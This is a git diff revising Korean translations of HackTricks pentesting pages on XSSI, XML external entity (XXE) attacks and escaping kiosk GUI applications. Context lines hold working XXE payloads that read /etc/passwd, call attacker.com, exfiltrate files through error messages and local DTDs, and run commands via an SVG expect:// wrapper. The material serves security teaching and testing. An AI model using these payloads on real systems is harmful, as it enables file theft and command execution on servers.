-Takeshi Terada의 연구는 Non-Script 파일, 예를 들어 CSV가 `script` 태그의 소스로 포함되어 교차 출처로 유출되는 또 다른 형태의 XSSI를 소개합니다. Jeremiah Grossman의 2006년 공격으로 Google 주소록을 완전히 읽고 Joe Walker의 2007년 JSON 데이터 유출과 같은 XSSI의 역사적 사례는 이러한 위협의 심각성을 강조합니다. 또한, Gareth Heyes는 특정 브라우저에서 효과적인 JSON 형식을 탈출하고 스크립트를 실행하기 위해 UTF-7로 인코딩된 JSON을 포함하는 공격 변형을 설명합니다.
+Takeshi Terada의 연구는 Non-Script 파일, 예를 들어 CSV가 `script` 태그의 소스로 포함되어 교차 출처로 유출되는 또 다른 형태의 XSSI를 소개합니다. Jeremiah Grossman의 2006년 공격으로 Google 주소록 전체를 읽고 Joe Walker의 2007년 JSON 데이터 유출과 같은 XSSI의 역사적 사례는 이러한 위협의 심각성을 강조합니다. 또한, Gareth Heyes는 특정 브라우저에서 효과적인 JSON 형식을 탈출하고 스크립트를 실행하기 위해 UTF-7로 인코딩된 JSON을 포함하는 공격 변형을 설명합니다.
 ```javascript
 ;[
 {
diff --git a/src/pentesting-web/xxe-xee-xml-external-entity.md b/src/pentesting-web/xxe-xee-xml-external-entity.md
index 20ebf2d0d..a94223d81 100644
--- a/src/pentesting-web/xxe-xee-xml-external-entity.md
+++ b/src/pentesting-web/xxe-xee-xml-external-entity.md
@@ -2,23 +2,23 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-## XML 기본
+## XML Basics
 
-XML은 데이터 저장 및 전송을 위해 설계된 마크업 언어로, 설명적으로 명명된 태그를 사용할 수 있는 유연한 구조를 특징으로 합니다. HTML과는 달리 미리 정의된 태그 집합에 제한되지 않습니다. JSON의 부상으로 XML의 중요성은 감소했지만, 초기 AJAX 기술에서 중요한 역할을 했습니다.
+XML은 데이터 저장 및 전송을 위해 설계된 마크업 언어로, 설명적으로 명명된 태그를 사용할 수 있는 유연한 구조를 특징으로 합니다. XML은 미리 정의된 태그 집합에 제한되지 않기 때문에 HTML과 다릅니다. JSON의 부상으로 XML의 중요성은 감소했지만, 초기 AJAX 기술에서 중요한 역할을 했습니다.
 
-- **엔티티를 통한 데이터 표현**: XML의 엔티티는 `&lt;` 및 `&gt;`와 같은 특수 문자를 포함한 데이터를 표현할 수 있게 해주며, 이는 XML의 태그 시스템과의 충돌을 피하기 위해 `<` 및 `>`에 해당합니다.
-- **XML 요소 정의**: XML은 요소 유형을 정의할 수 있게 하여 요소가 어떻게 구조화되어야 하고 어떤 내용을 포함할 수 있는지를 설명합니다. 이는 모든 유형의 콘텐츠에서 특정 자식 요소에 이르기까지 다양합니다.
-- **문서 유형 정의 (DTD)**: DTD는 XML에서 문서의 구조와 포함할 수 있는 데이터 유형을 정의하는 데 중요합니다. DTD는 내부, 외부 또는 조합으로 존재할 수 있으며, 문서의 형식과 유효성을 안내합니다.
-- **사용자 정의 및 외부 엔티티**: XML은 유연한 데이터 표현을 위해 DTD 내에서 사용자 정의 엔티티 생성을 지원합니다. URL로 정의된 외부 엔티티는 XML 외부 엔티티(XXE) 공격의 맥락에서 보안 문제를 일으키며, 이는 XML 파서가 외부 데이터 소스를 처리하는 방식을 악용합니다: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
+- **데이터 표현을 위한 엔티티**: XML의 엔티티는 `&lt;` 및 `&gt;`와 같은 특수 문자를 포함한 데이터 표현을 가능하게 하며, 이는 XML의 태그 시스템과의 충돌을 피하기 위해 `<` 및 `>`에 해당합니다.
+- **XML 요소 정의**: XML은 요소 유형을 정의할 수 있으며, 요소가 어떻게 구조화되어야 하고 어떤 내용을 포함할 수 있는지를 설명합니다. 이는 모든 유형의 콘텐츠에서 특정 자식 요소에 이르기까지 다양합니다.
+- **문서 유형 정의 (DTD)**: DTD는 XML에서 문서의 구조와 포함할 수 있는 데이터 유형을 정의하는 데 중요합니다. DTD는 내부, 외부 또는 조합일 수 있으며, 문서가 어떻게 형식화되고 검증되는지를 안내합니다.
+- **사용자 정의 및 외부 엔티티**: XML은 DTD 내에서 유연한 데이터 표현을 위해 사용자 정의 엔티티 생성을 지원합니다. URL로 정의된 외부 엔티티는 보안 문제를 일으키며, 특히 XML 외부 엔티티(XXE) 공격의 맥락에서 XML 파서가 외부 데이터 소스를 처리하는 방식을 악용합니다: `<!DOCTYPE foo [ <!ENTITY myentity "value" > ]>`
 - **매개변수 엔티티를 통한 XXE 탐지**: XXE 취약점을 탐지하기 위해, 특히 파서 보안 조치로 인해 기존 방법이 실패할 때 XML 매개변수 엔티티를 활용할 수 있습니다. 이러한 엔티티는 DNS 조회 또는 제어된 도메인에 대한 HTTP 요청을 트리거하는 등의 비대면 탐지 기술을 허용하여 취약성을 확인합니다.
 - `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///etc/passwd" > ]>`
 - `<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://attacker.com" > ]>`
 
-## 주요 공격
+## Main attacks
 
 [**이 공격의 대부분은 훌륭한 Portswiggers XEE 실험실을 사용하여 테스트되었습니다: https://portswigger.net/web-security/xxe**](https://portswigger.net/web-security/xxe)
 
-### 새로운 엔티티 테스트
+### New Entity test
 
 이 공격에서는 간단한 새로운 ENTITY 선언이 작동하는지 테스트할 것입니다.
 ```xml
@@ -125,12 +125,12 @@ XXE는 클라우드 내에서 SSRF를 악용하는 데 사용될 수 있습니
 
 ### 오류 기반(외부 DTD)
 
-**이 경우, 서버가 오류 메시지 내에서 파일의 내용을 보여주는 악의적인 DTD를 로드하도록 만들 것입니다(이는 오류 메시지를 볼 수 있는 경우에만 유효합니다).** [**여기서 예시.**](https://portswigger.net/web-security/xxe/blind)
+**이 경우, 서버가 오류 메시지 내에서 파일의 내용을 표시하는 악의적인 DTD를 로드하도록 만들 것입니다(이는 오류 메시지를 볼 수 있는 경우에만 유효합니다).** [**여기에서 예시.**](https://portswigger.net/web-security/xxe/blind)
 
 악의적인 외부 문서 유형 정의(DTD)를 사용하여 `/etc/passwd` 파일의 내용을 드러내는 XML 파싱 오류 메시지를 유발할 수 있습니다. 이는 다음 단계로 수행됩니다:
 
-1. `/etc/passwd` 파일의 내용을 포함하는 `file`이라는 XML 매개변수 엔티티가 정의됩니다.
-2. `eval`이라는 XML 매개변수 엔티티가 정의되며, 이는 `error`라는 또 다른 XML 매개변수 엔티티에 대한 동적 선언을 포함합니다. 이 `error` 엔티티는 평가될 때 존재하지 않는 파일을 로드하려고 시도하며, `file` 엔티티의 내용을 이름으로 포함합니다.
+1. `file`이라는 XML 매개변수 엔티티가 정의되며, 이 엔티티는 `/etc/passwd` 파일의 내용을 포함합니다.
+2. `eval`이라는 XML 매개변수 엔티티가 정의되며, 이는 `error`라는 다른 XML 매개변수 엔티티에 대한 동적 선언을 포함합니다. 이 `error` 엔티티는 평가될 때 존재하지 않는 파일을 로드하려고 시도하며, `file` 엔티티의 내용을 이름으로 포함합니다.
 3. `eval` 엔티티가 호출되어 `error` 엔티티의 동적 선언이 이루어집니다.
 4. `error` 엔티티의 호출은 존재하지 않는 파일을 로드하려고 시도하여, `/etc/passwd` 파일의 내용을 파일 이름의 일부로 포함하는 오류 메시지를 생성합니다.
 
@@ -148,11 +148,11 @@ _**외부 DTD는 두 번째 안에 하나의 엔티티를 포함할 수 있게 
 
 ### **오류 기반 (시스템 DTD)**
 
-그렇다면 **아웃 오브 밴드 상호작용이 차단된** 경우의 블라인드 XXE 취약점은 어떻게 될까요? (외부 연결이 불가능한 경우).
+그렇다면 **외부 연결이 차단된** 경우 블라인드 XXE 취약점은 어떻게 됩니까?
 
-XML 언어 사양의 허점은 **문서의 DTD가 내부 및 외부 선언을 혼합할 때 오류 메시지를 통해 민감한 데이터를 노출할 수 있습니다**. 이 문제는 외부에서 선언된 엔티티의 내부 재정의를 허용하여 오류 기반 XXE 공격의 실행을 용이하게 합니다. 이러한 공격은 외부 DTD에서 원래 선언된 XML 매개변수 엔티티의 재정의를 악용합니다. 서버에 의해 아웃 오브 밴드 연결이 차단되면 공격자는 공격을 수행하기 위해 로컬 DTD 파일에 의존해야 하며, 민감한 정보를 드러내기 위해 구문 오류를 유도하는 것을 목표로 합니다.
+XML 언어 사양의 허점은 **문서의 DTD가 내부 및 외부 선언을 혼합할 때 오류 메시지를 통해 민감한 데이터를 노출할 수 있습니다**. 이 문제는 외부에서 선언된 엔티티의 내부 재정의를 허용하여 오류 기반 XXE 공격의 실행을 용이하게 합니다. 이러한 공격은 외부 DTD에서 원래 선언된 XML 매개변수 엔티티의 재정의를 악용합니다. 서버에 의해 외부 연결이 차단되면 공격자는 공격을 수행하기 위해 로컬 DTD 파일에 의존해야 하며, 민감한 정보를 드러내기 위해 구문 오류를 유도하는 것을 목표로 합니다.
 
-서버의 파일 시스템에 `/usr/local/app/schema.dtd`에 DTD 파일이 존재하고, `custom_entity`라는 엔티티를 정의하고 있다고 가정해 보겠습니다. 공격자는 다음과 같이 하이브리드 DTD를 제출하여 `/etc/passwd` 파일의 내용을 드러내는 XML 구문 오류를 유도할 수 있습니다:
+서버의 파일 시스템에 `/usr/local/app/schema.dtd`에 DTD 파일이 포함되어 있고, `custom_entity`라는 엔티티를 정의하고 있다고 가정해 보십시오. 공격자는 다음과 같이 하이브리드 DTD를 제출하여 `/etc/passwd` 파일의 내용을 드러내는 XML 구문 오류를 유도할 수 있습니다:
 ```xml
 <!DOCTYPE foo [
 <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd">
@@ -168,10 +168,10 @@ XML 언어 사양의 허점은 **문서의 DTD가 내부 및 외부 선언을 
 이 DTD에 의해 설명된 단계가 실행됩니다:
 
 - `local_dtd`라는 XML 매개변수 엔티티의 정의에는 서버의 파일 시스템에 위치한 외부 DTD 파일이 포함됩니다.
-- 외부 DTD에서 원래 정의된 `custom_entity` XML 매개변수 엔티티에 대한 재정의가 발생하여 [오류 기반 XXE 익스플로잇](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages)을 캡슐화합니다. 이 재정의는 구문 오류를 유도하여 `/etc/passwd` 파일의 내용을 노출하도록 설계되었습니다.
+- 외부 DTD에서 원래 정의된 `custom_entity` XML 매개변수 엔티티에 대한 재정의가 발생하여 [오류 기반 XXE 익스플로잇](https://portswigger.net/web-security/xxe/blind#exploiting-blind-xxe-to-retrieve-data-via-error-messages)을 캡슐화합니다. 이 재정의는 구문 오류를 유발하도록 설계되어 `/etc/passwd` 파일의 내용을 노출합니다.
 - `local_dtd` 엔티티를 사용하여 외부 DTD가 활성화되고 새로 정의된 `custom_entity`가 포함됩니다. 이 일련의 작업은 익스플로잇을 위해 목표로 하는 오류 메시지를 발생시킵니다.
 
-**실제 예:** GNOME 데스크탑 환경을 사용하는 시스템은 종종 `/usr/share/yelp/dtd/docbookx.dtd`에 `ISOamso`라는 엔티티가 포함된 DTD를 가지고 있습니다.
+**실제 사례:** GNOME 데스크탑 환경을 사용하는 시스템은 종종 `/usr/share/yelp/dtd/docbookx.dtd`에 `ISOamso`라는 엔티티가 포함된 DTD를 가지고 있습니다.
 ```xml
 <?xml version="1.0" encoding="UTF-8"?>
 <!DOCTYPE foo [
@@ -188,7 +188,7 @@ XML 언어 사양의 허점은 **문서의 DTD가 내부 및 외부 선언을 
 ```
 ![](<../images/image (625).png>)
 
-이 기술은 **내부 DTD를 사용하므로 먼저 유효한 DTD를 찾아야 합니다**. 이를 위해 **서버가 사용하는 동일한 OS / 소프트웨어를 설치하고** **일부 기본 DTD를 검색하거나**, **시스템 내의 기본 DTD 목록을 가져와서** **그 중 하나가 존재하는지 확인**할 수 있습니다:
+이 기술은 **내부 DTD를 사용하므로 먼저 유효한 DTD를 찾아야 합니다**. 이를 위해 **서버가 사용하는 동일한 OS / 소프트웨어를 설치하고** **일부 기본 DTD를 검색하거나**, **시스템 내의 기본 DTD 목록을 가져와서** **그 중 어떤 것이 존재하는지 확인할 수 있습니다**:
 ```xml
 <!DOCTYPE foo [
 <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
@@ -217,9 +217,9 @@ Testing 0 entities : []
 ```
 ### XXE via Office Open XML Parsers
 
-이 공격에 대한 더 깊은 설명은 **[**이 놀라운 포스트**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/) **의 두 번째 섹션을 확인하세요**.
+이 공격에 대한 더 깊은 설명은 **Detectify의** [**이 놀라운 게시물**](https://labs.detectify.com/2021/09/15/obscure-xxe-attacks/)의 두 번째 섹션을 **확인하세요**.
 
-**Microsoft Office 문서를 업로드할 수 있는 기능은 많은 웹 애플리케이션에서 제공됩니다**, 이후 이 문서에서 특정 세부 정보를 추출합니다. 예를 들어, 웹 애플리케이션은 사용자가 XLSX 형식의 스프레드시트를 업로드하여 데이터를 가져오는 것을 허용할 수 있습니다. 파서가 스프레드시트에서 데이터를 추출하기 위해서는 반드시 하나 이상의 XML 파일을 파싱해야 합니다.
+**Microsoft Office 문서 업로드 기능은 많은 웹 애플리케이션에서 제공됩니다**, 이후 이 문서에서 특정 세부 정보를 추출합니다. 예를 들어, 웹 애플리케이션은 사용자가 XLSX 형식의 스프레드시트를 업로드하여 데이터를 가져오는 것을 허용할 수 있습니다. 파서가 스프레드시트에서 데이터를 추출하기 위해서는 반드시 하나 이상의 XML 파일을 파싱해야 합니다.
 
 이 취약점을 테스트하기 위해서는 **XXE 페이로드가 포함된 Microsoft Office 파일을 생성해야 합니다**. 첫 번째 단계는 문서를 압축 해제할 수 있는 빈 디렉토리를 만드는 것입니다.
 
@@ -244,7 +244,7 @@ jar:https://download.host.com/myarchive.zip!/file.txt
 PKZIP 아카이브 내의 파일에 접근하는 과정은 여러 단계를 포함합니다:
 
 1. 지정된 위치에서 zip 아카이브를 다운로드하기 위해 HTTP 요청이 이루어집니다, 예를 들어 `https://download.website.com/archive.zip`.
-2. 아카이브를 포함하는 HTTP 응답은 시스템에 임시로 저장되며, 일반적으로 `/tmp/...`와 같은 위치에 저장됩니다.
+2. 아카이브를 포함하는 HTTP 응답이 시스템에 임시로 저장되며, 일반적으로 `/tmp/...`와 같은 위치에 저장됩니다.
 3. 아카이브가 추출되어 그 내용을 접근합니다.
 4. 아카이브 내의 특정 파일인 `file.zip`이 읽힙니다.
 5. 작업 후, 이 과정에서 생성된 임시 파일은 삭제됩니다.
@@ -308,7 +308,7 @@ Responder.py -I eth0 -v
 
 ### XInclude
 
-서버 측 XML 문서에 클라이언트 데이터를 통합할 때, 백엔드 SOAP 요청과 같은 경우, XML 구조에 대한 직접적인 제어는 종종 제한되어 `DOCTYPE` 요소를 수정하는 데 제한이 있어 전통적인 XXE 공격이 어려워집니다. 그러나 `XInclude` 공격은 XML 문서의 모든 데이터 요소 내에 외부 엔티티를 삽입할 수 있도록 하여 해결책을 제공합니다. 이 방법은 서버에서 생성된 XML 문서 내의 데이터 일부만 제어할 수 있을 때도 효과적입니다.
+서버 측 XML 문서에 클라이언트 데이터를 통합할 때, 백엔드 SOAP 요청과 같은 경우, XML 구조에 대한 직접적인 제어는 종종 제한되어 `DOCTYPE` 요소를 수정하는 데 제한이 있어 전통적인 XXE 공격이 어려워집니다. 그러나 `XInclude` 공격은 XML 문서의 모든 데이터 요소 내에 외부 엔티티를 삽입할 수 있도록 하여 해결책을 제공합니다. 이 방법은 서버에서 생성된 XML 문서 내의 데이터 일부만 제어할 수 있는 경우에도 효과적입니다.
 
 `XInclude` 공격을 실행하려면 `XInclude` 네임스페이스를 선언하고 의도된 외부 엔티티의 파일 경로를 지정해야 합니다. 아래는 그러한 공격을 어떻게 구성할 수 있는지에 대한 간결한 예입니다:
 ```xml
@@ -326,13 +326,13 @@ Check [https://portswigger.net/web-security/xxe](https://portswigger.net/web-sec
 ```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200"><image xlink:href="file:///etc/hostname"></image></svg>
 ```
-또 다른 방법은 PHP "expect" 래퍼를 통해 **명령어를 실행**하려고 시도하는 것입니다:
+또 다른 방법은 PHP "expect" 래퍼를 통해 **명령을 실행**하려고 시도하는 것입니다:
 ```xml
 <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
 <image xlink:href="expect://ls"></image>
 </svg>
 ```
-SVG 형식은 서버 소프트웨어의 XML 처리 기능을 악용하는 공격을 시작하는 데 사용되며, 강력한 입력 검증 및 보안 조치의 필요성을 강조합니다.
+SVG 형식은 서버 소프트웨어의 XML 처리 기능을 악용하는 공격을 시작하는 데 사용되며, 이는 강력한 입력 검증 및 보안 조치의 필요성을 강조합니다.
 
 자세한 정보는 [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)를 확인하세요!
 
@@ -356,7 +356,7 @@ Content-Length: 7
 
 foo=bar
 ```
-그럼 다음 요청을 제출할 수 있을 것입니다. 같은 결과를 얻을 수 있습니다:
+그럼 다음 요청을 제출할 수 있을 것입니다. 결과는 동일합니다:
 ```xml
 POST /action HTTP/1.0
 Content-Type: text/xml
@@ -406,7 +406,7 @@ Content-Type: application/xml;charset=UTF-8
 
 ### UTF-7
 
-여기서 \[**"Encode Recipe**" of cyberchef를 사용하여]\(\[[https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7](https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7) %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4)to]\([https://gchq.github.io/CyberChef/#recipe=Encode_text%28'UTF-7 %2865000%29'%29\&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to](https://gchq.github.io/CyberChef/#recipe=Encode_text%28%27UTF-7%20%2865000%29%27%29&input=PCFET0NUWVBFIGZvbyBbPCFFTlRJVFkgZXhhbXBsZSBTWVNURU0gIi9ldGMvcGFzc3dkIj4gXT4KPHN0b2NrQ2hlY2s%2BPHByb2R1Y3RJZD4mZXhhbXBsZTs8L3Byb2R1Y3RJZD48c3RvcmVJZD4xPC9zdG9yZUlkPjwvc3RvY2tDaGVjaz4%29to)) UTF-7로 변환합니다.
+여기서 \[**"Encode Recipe**" of cyberchef\]를 사용할 수 있습니다.
 ```xml
 <!xml version="1.0" encoding="UTF-7"?-->
 +ADw-+ACE-DOCTYPE+ACA-foo+ACA-+AFs-+ADw-+ACE-ENTITY+ACA-example+ACA-SYSTEM+ACA-+ACI-/etc/passwd+ACI-+AD4-+ACA-+AF0-+AD4-+AAo-+ADw-stockCheck+AD4-+ADw-productId+AD4-+ACY-example+ADs-+ADw-/productId+AD4-+ADw-storeId+AD4-1+ADw-/storeId+AD4-+ADw-/stockCheck+AD4-
@@ -420,15 +420,15 @@ Content-Type: application/xml;charset=UTF-8
 ```
 ### File:/ 프로토콜 우회
 
-웹이 PHP를 사용하고 있다면, `file:/` 대신 **php wrappers**`php://filter/convert.base64-encode/resource=`를 사용하여 **내부 파일**에 접근할 수 있습니다.
+웹이 PHP를 사용하고 있다면, `file:/` 대신 **php wrappers**`php://filter/convert.base64-encode/resource=`를 사용하여 **내부 파일**에 **접근**할 수 있습니다.
 
 웹이 Java를 사용하고 있다면 [**jar: 프로토콜**](xxe-xee-xml-external-entity.md#jar-protocol)을 확인할 수 있습니다.
 
 ### HTML 엔티티
 
 [**https://github.com/Ambrotd/XXE-Notes**](https://github.com/Ambrotd/XXE-Notes)에서의 트릭\
-**HTML 엔티티**로 인코딩된 **엔티티 내부의 엔티티**를 생성한 다음, 이를 호출하여 **dtd를 로드**할 수 있습니다.\
-사용되는 **HTML 엔티티**는 **숫자**여야 한다는 점에 유의하세요 (예를 들어 \[이 예제에서\]([https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
+**html 엔티티**로 인코딩하여 **엔티티 안에 엔티티**를 생성한 다음, 이를 호출하여 **dtd를 로드**할 수 있습니다.\
+사용되는 **HTML 엔티티**는 **숫자**여야 합니다 (예를 들어 \[이 예제에서\]([https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,'Numeric entities'%29\&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)\\](<https://gchq.github.io/CyberChef/#recipe=To_HTML_Entity%28true,%27Numeric%20entities%27%29&input=PCFFTlRJVFkgJSBkdGQgU1lTVEVNICJodHRwOi8vMTcyLjE3LjAuMTo3ODc4L2J5cGFzczIuZHRkIiA%2B)%5C>)).
 ```xml
 <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % a "&#x3C;&#x21;&#x45;&#x4E;&#x54;&#x49;&#x54;&#x59;&#x25;&#x64;&#x74;&#x64;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x6F;&#x75;&#x72;&#x73;&#x65;&#x72;&#x76;&#x65;&#x72;&#x2E;&#x63;&#x6F;&#x6D;&#x2F;&#x62;&#x79;&#x70;&#x61;&#x73;&#x73;&#x2E;&#x64;&#x74;&#x64;&#x22;&#x3E;" >%a;%dtd;]>
 <data>
@@ -677,7 +677,7 @@ XMLDecoder는 XML 메시지를 기반으로 객체를 생성하는 Java 클래
 
 - [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\\
 - [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\\
-- 자신의 외부 DTD를 사용하여 HTTP를 통해 정보 추출: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
+- HTTP를 통해 자체 외부 DTD를 사용하여 정보 추출: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\\
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\\
 - [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\\
 - [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\\
diff --git a/src/physical-attacks/escaping-from-gui-applications/README.md b/src/physical-attacks/escaping-from-gui-applications/README.md
index 05a605979..784698af0 100644
--- a/src/physical-attacks/escaping-from-gui-applications/README.md
+++ b/src/physical-attacks/escaping-from-gui-applications/README.md
@@ -2,7 +2,7 @@
 
 # GUI 애플리케이션 내에서 가능한 작업 확인
 
-**일반 대화상자**는 **파일 저장**, **파일 열기**, 글꼴 선택, 색상 선택 등의 옵션입니다. 이들 대부분은 **전체 탐색기 기능을 제공**합니다. 즉, 이러한 옵션에 접근할 수 있다면 탐색기 기능에 접근할 수 있습니다:
+**일반 대화상자**는 **파일 저장**, **파일 열기**, 글꼴 선택, 색상 선택 등의 옵션입니다. 이들 대부분은 **전체 탐색기 기능을 제공합니다**. 이는 이러한 옵션에 접근할 수 있다면 탐색기 기능에 접근할 수 있음을 의미합니다:
 
 - 닫기/다른 이름으로 닫기
 - 열기/다른 프로그램으로 열기
@@ -78,8 +78,8 @@ _bash, sh, zsh..._ 더 많은 정보는 여기에서: [https://gtfobins.github.i
 - 스티키 키 – SHIFT 5회 누르기
 - 마우스 키 – SHIFT+ALT+NUMLOCK
 - 고대비 – SHIFT+ALT+PRINTSCN
-- 토글 키 – NUMLOCK 5초 동안 누르기
-- 필터 키 – 오른쪽 SHIFT 12초 동안 누르기
+- 토글 키 – NUMLOCK를 5초 동안 누르기
+- 필터 키 – 오른쪽 SHIFT를 12초 동안 누르기
 - WINDOWS+F1 – Windows 검색
 - WINDOWS+D – 바탕 화면 표시
 - WINDOWS+E – Windows 탐색기 실행
@@ -148,7 +148,7 @@ iKat 버전 백업:
 [http://swin.es/k/](http://swin.es/k/)\
 [http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
 
-JavaScript를 사용하여 일반 대화상자를 만들고 파일 탐색기에 접근: `document.write('<input/type=file>')`
+JavaScript를 사용하여 일반 대화상자를 만들고 파일 탐색기에 접근하기: `document.write('<input/type=file>')`
 출처: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
 
 # iPad
@@ -175,7 +175,7 @@ JavaScript를 사용하여 일반 대화상자를 만들고 파일 탐색기에
 
 - 오른쪽 상단 모서리의 전원/슬립 버튼과 홈 버튼을 몇 초 동안 누르기: 강제로 전원 끄기
 
-- 오른쪽 상단 모서리의 전원/슬립 버튼과 홈 버튼을 빠르게 누르기: 화면의 왼쪽 하단에 나타나는 스크린샷을 찍습니다. 두 버튼을 동시에 아주 짧게 누르세요. 몇 초 동안 누르면 강제로 전원 꺼짐이 수행됩니다.
+- 오른쪽 상단 모서리의 전원/슬립 버튼과 홈 버튼을 빠르게 누르기: 화면의 왼쪽 하단에 팝업되는 스크린샷을 찍습니다. 두 버튼을 동시에 아주 짧게 누르세요. 몇 초 동안 누르면 강제로 전원 꺼짐이 수행됩니다.
 
 ## 단축키
 
@@ -196,7 +196,7 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
 
 ### 시스템 단축키
 
-이 단축키는 iPad의 사용에 따라 시각적 설정 및 사운드 설정을 위한 것입니다.
+이 단축키는 iPad의 사용에 따라 시각적 설정 및 소리 설정을 위한 것입니다.
 
 | Shortcut | Action                                                                         |
 | -------- | ------------------------------------------------------------------------------ |
@@ -219,24 +219,24 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
 | ⌘ (Space)                                          | Spotlight 열기                                         |
 | ⌘⇥ (Command-Tab)                                   | 최근 사용한 앱 10개 목록                              |
 | ⌘\~                                                | 마지막 앱으로 이동                                     |
-| ⌘⇧3 (Command-Shift-3)                              | 스크린샷 (저장하거나 작업을 수행하기 위해 왼쪽 하단에 나타남) |
+| ⌘⇧3 (Command-Shift-3)                              | 스크린샷 (저장하거나 작업하기 위해 왼쪽 하단에 떠 있습니다) |
 | ⌘⇧4                                                | 스크린샷을 찍고 편집기로 열기                         |
-| ⌘을 누르고 유지                                   | 앱에 대한 사용 가능한 단축키 목록 표시                |
+| ⌘을 누르고 유지                                   | 앱에 대한 사용 가능한 단축키 목록 표시               |
 | ⌘⌥D (Command-Option/Alt-D)                         | 도크 표시                                              |
 | ^⌥H (Control-Option-H)                             | 홈 버튼                                               |
 | ^⌥H H (Control-Option-H-H)                         | 멀티태스킹 바 표시                                     |
 | ^⌥I (Control-Option-i)                             | 항목 선택기                                           |
 | Escape                                             | 뒤로 버튼                                             |
 | → (오른쪽 화살표)                                  | 다음 항목                                             |
-| ← (왼쪽 화살표)                                   | 이전 항목                                             |
-| ↑↓ (위쪽 화살표, 아래쪽 화살표)                   | 선택한 항목을 동시에 탭                                |
+| ← (왼쪽 화살표)                                    | 이전 항목                                             |
+| ↑↓ (위쪽 화살표, 아래쪽 화살표)                    | 선택한 항목을 동시에 탭                                |
 | ⌥ ↓ (Option-Down arrow)                            | 아래로 스크롤                                         |
 | ⌥↑ (Option-Up arrow)                               | 위로 스크롤                                           |
 | ⌥← 또는 ⌥→ (Option-Left arrow 또는 Option-Right arrow) | 왼쪽 또는 오른쪽으로 스크롤                           |
-| ^⌥S (Control-Option-S)                             | VoiceOver 음성 켜기 또는 끄기                          |
+| ^⌥S (Control-Option-S)                             | VoiceOver 음성을 켜거나 끄기                           |
 | ⌘⇧⇥ (Command-Shift-Tab)                            | 이전 앱으로 전환                                      |
-| ⌘⇥ (Command-Tab)                                   | 원래 앱으로 돌아가기                                   |
-| ←+→, 그 다음 Option + ← 또는 Option+→             | 도크를 탐색                                           |
+| ⌘⇥ (Command-Tab)                                   | 원래 앱으로 다시 전환                                  |
+| ←+→, 그 다음 Option + ← 또는 Option+→             | 도크를 통해 탐색                                      |
 
 ### Safari 단축키
 
@@ -262,9 +262,9 @@ iPad 키보드 또는 USB 키보드 어댑터가 있어야 합니다. 애플리
 | ⌘L                         | 위치 열기                   |
 | ⌘T                         | 새 탭 열기                  |
 | ⌘W                         | 현재 탭 닫기                |
-| ⌘R                         | 현재 탭 새로 고침           |
-| ⌘.                         | 현재 탭 로딩 중지           |
